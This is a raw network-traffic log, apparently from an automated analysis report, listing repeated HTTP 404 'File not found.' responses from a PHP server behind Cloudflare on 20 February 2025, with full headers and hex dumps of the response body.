            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bAcJZs%2FVOCFh91LycsGtIfrm00HJ%2BshUvzH49lEk9cEtykO%2BGApOqHZrt6vebR9i4Q06gNztmojLX7446eiXMpR2ivD5aT7apzhkkyxSgoUklBeceOmWu5oj92U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75a959dc4285-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1736&rtt_var=868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TsJEvXezbevvgL5rPQNZisGFlfgtzcj49NYlAl%2B%2Fpi5ndqLBOuVz0%2F4TVvdE2yEeP86O%2Bxn3zhijr1gsIdT1oNXkIL%2B9VwSMGv09tA%2FVbHVO5C%2BUZeyIpsZkZJ8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75ae4b5142d4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1704&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z1u2PzyajKaCEwPde7AQEPInM73d83sdfUI5glFiyWgRVYnxBF9hRt31X0UwYr0I%2FfkfjlykdfdukwrbDRCE6mvvz7QqHCQ2jos%2Fqf%2FZqD7zfL2k3oLsUUT2p9o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75babbaf8cbd-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2181&min_rtt=2181&rtt_var=1090&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gKAJKEFoBlGVEXuz0RIgYp0CqLBDtS519VLkBUYUEZw8cvJolKWuMVZdICIq96ectAJ%2FiEwL8Jo5cTXclnLOL%2BwLdxETZGceTGb4Wz90dhr7mko2vWXYPo%2Fc4Qs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75c08840c3ff-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1560&rtt_var=780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2BG9wSmnFmL4DMFNW2uVTEjObHkDf46icUxLd9isxMQdmRGp%2FlKxvU0%2F%2Bd0HpvW7jdFjuqCd%2B7czaw0nSqCM1ib1UhOFs9TP4KdkduEZBinCl4bMlks7h5vXLcE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75c74d851a44-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1889&rtt_var=944&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Esvmn8hRJyfhTjYsE2S%2FQ9u7tduXOcC5gK1WnLpVEGEvtZx2tzMZs3KjioLoEb6MV9IApxzQfBlprNpgreJOwU%2F4ocSKWynu3DVG1MIuiaeWFAeY4FzOWf%2B0XvQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75cd3ec5443e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1588&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2v%2BweKL1XPnvQQ%2FSPbK4Nhy8%2FovOykEPdisFxHtrqiORLBUWs73L%2FklPpeKFugrdWzdXCAYcoxk3DY%2BvPQLcOT9apIZm5gR0gfjuCQElmqNQJl3MvbDQl%2BmdX7E%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75d1ef5a8c71-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1803&rtt_var=901&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1aVncoQ6E4Cd%2Fc1lJYmMZnenLjQRS%2FPvFP5ARnvPPUYJFLkJFNwdNEuM4ejRg%2F%2FG2Vmt0wsXam5diySbE%2F0CYpQl6TV7MANtKzE%2BNuArTDpyOq%2BRd4H7CCCr7lM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75e3bde05e78-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1720&rtt_var=860&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=41uJS8Ux6eSXx%2BUHL6nI2UJCseomNWDHeVD0uy%2FyLmpG5D6834ohLdRKdLFRH9Wl5rOw5bdG0wqe%2FIpBoI9mwxiH3Iea%2B5xPSm3vEb2tqK6MdtT5diepz3wsVno%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75eeefd70ca4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1514&min_rtt=1514&rtt_var=757&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SFhuUzogV05xNVMVQAqvgJ2K5PFkrwK0qfEP%2BZ8bMKQ4aYpVBPL2DpIrun1xTZVtZdhBLDOGT6CggxCMM2U0V3vqujgQwEzqp%2Bp1B9cvx%2BYDybE29LtHRx6VJg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75f6681e7d00-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=8997&min_rtt=8997&rtt_var=4498&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zf%2Bfk339tpNvXc%2BjF9Q2QsbVUMmr3WeGERiGrd%2BAs9YFTLf5mHE1uXAYeyyZKwLAk0ptXBcrUCGyg04rRRiT7T%2F%2F8FC8ceI1J6mUo0WuI1IVH88CzI8xktFSpvw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75fc7bac41d3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jaA2YP0DLxes5S285%2BKcHA13GgsnZB3FzxuE%2FEF3kms%2FM34uoCXqrhjoztBXBB5Zm11XlZjGarUQSw2q5gO0Cuw%2BtYmu0DusHpKYzQBKAmq7LkUOEbOLSAjLoMI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7601af2143f7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1561&rtt_var=780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XHg3ob%2Bp31sTOVRCOhFda%2B6PEbEhMzdGsRlJx%2FscuA6n%2FLuHeOdEMRPMA%2F8%2FvjxSKIUKoEfEohl37koBG%2B9mZwZxsBBVDc%2FHpON9Two5xcmfsc8cGF6cnuTV72c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f76092cb042be-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1714&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R9ttzZyoURRCuqNN6bY%2F3k%2FlHgDLbVn048jKM8al7kvqLRX94QJ%2BWqtT%2Bkt4Xgq0w9I0nh9QrDz1aX0sMf4%2BHn2PstUsVXEpC1ZkvfCwENNGrH5cSg8CiPDJyXs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f760f58bf426a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5732&min_rtt=5732&rtt_var=2866&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x0zvKattA2IdE%2FV5Y3eEU%2F5Y0KARcSaXIgQ07PY9AdnVJrG%2F%2BL1sGwH%2BreT%2BhloBlc2wFXfpsvbaG6GYqun447%2FACogkOLFeJ996TG0R4RrBS%2BlfNA8CC0%2FarZQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7616cf4f42b9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1750&min_rtt=1750&rtt_var=875&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajFP92mMOJCn0Jdz6PQaWGgYC2WGKVyhh3EMuVHzTL5F7W8ObHeY%2BtiRuZ18N%2B4b7mxT3KXJU%2FHbAbwHlySVuaskxv7pglP9xnN9utqu8Dz4UZ%2BYDRvfdOth7ts%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f761bfb5741ba-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1756&rtt_var=878&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fleTEoS1c4HUZlB9WSpxGxTpbEZlFsFMGa7BWQJMkQh0hLrd9%2FwxERcaIr8ycuih5nyUGTQDkMSGqNOHWjf8L2bnsntD9%2FWsZe4v2zuu5pCSpxzZd%2BeWCnXp1sA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7621099f42aa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1781&min_rtt=1781&rtt_var=890&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X8HxA3VB1doFA6MtNMP1Gjz6UmDfeePhB%2FzKD9UWCaK8nvOwM8zPAz2RiPDriQ33S7Ez6W53bT%2FxJjboplwVBYdlXbYJeJGHkgd0%2BLeto7paUChaRf68XGN9I40%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f76272b004390-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1572&rtt_var=786&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NvYwtNm3AGndmTjSGcLaavXvQmfPqR3HQ6sfGrnRJb0FM88uWOcAsoXr%2FdyzdDy0vrWj42bO%2Br5YpRvSwZk5dp%2F%2BlbxEaU%2BkeJt4yTes0qjwZ2K3FcG9lWiMkuo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7632fc0b0f95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1520&rtt_var=760&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfhEr9hCl83LdWHRApVDMTgT8CeP0Uqh6aeoWaHLZw03fKCSP8J7NoVYncgEh4MpXvra23DEDQLpdRA%2BEOicejs%2B0Fju9%2FVJ%2FLsHFx1XJ0x9MGT98HEvfXCfAsk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f763eea6442ad-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1604&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6XJAg2QGrPtjlPyGthFGqUvfoRIBbvdBFjvtAGC3U1k25gSjB39eJTUJKiy4ZKbeA6n0qTwmZH7pZNgKhYYlK2S17XuualAYWIRlMUgTfCnRbFhooLEcLbFX3d0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f764b0a8b41f3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1733&min_rtt=1733&rtt_var=866&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tzsMnC3nFwY3wq9kuxKVYKPTSC2Lgy9z%2B%2BYmHnNOT4cnGmlHCZeTuTqOZAvj4lCgUKi%2B%2FIX7QeSI%2FkfMDZE%2F%2B0aTy4ZIVep2UB0kXEcK60laKAXjRKyMhEAehPY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f76502d55423b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1783&rtt_var=891&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HccRvP9LfIY7YnxQKZ1ISVcqenDJqnnxYbgombUMrgPXhqEN%2FUnjQ395rbCwQQ%2FY%2FQ%2FXy5LFk6w94Br8XFE98d2U167jgYB9%2FN6MV5dNZxGk4pjjHrONuJKLRyI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f76561fb10f90-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1515&min_rtt=1515&rtt_var=757&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=107&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jk3nTyu0pIP%2B0oQxa0QePsYLMkPblbWyv%2B8hnBb6IFjDL17Ufbo%2FRAWMy9V8zG1O0WiTYAK%2BfEyHLuZbjY0yyOx11ThUw2EO%2FU6V0aceLMzAItcssXun%2BqFJSPI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7663ac438ce9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=2045&rtt_var=1022&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
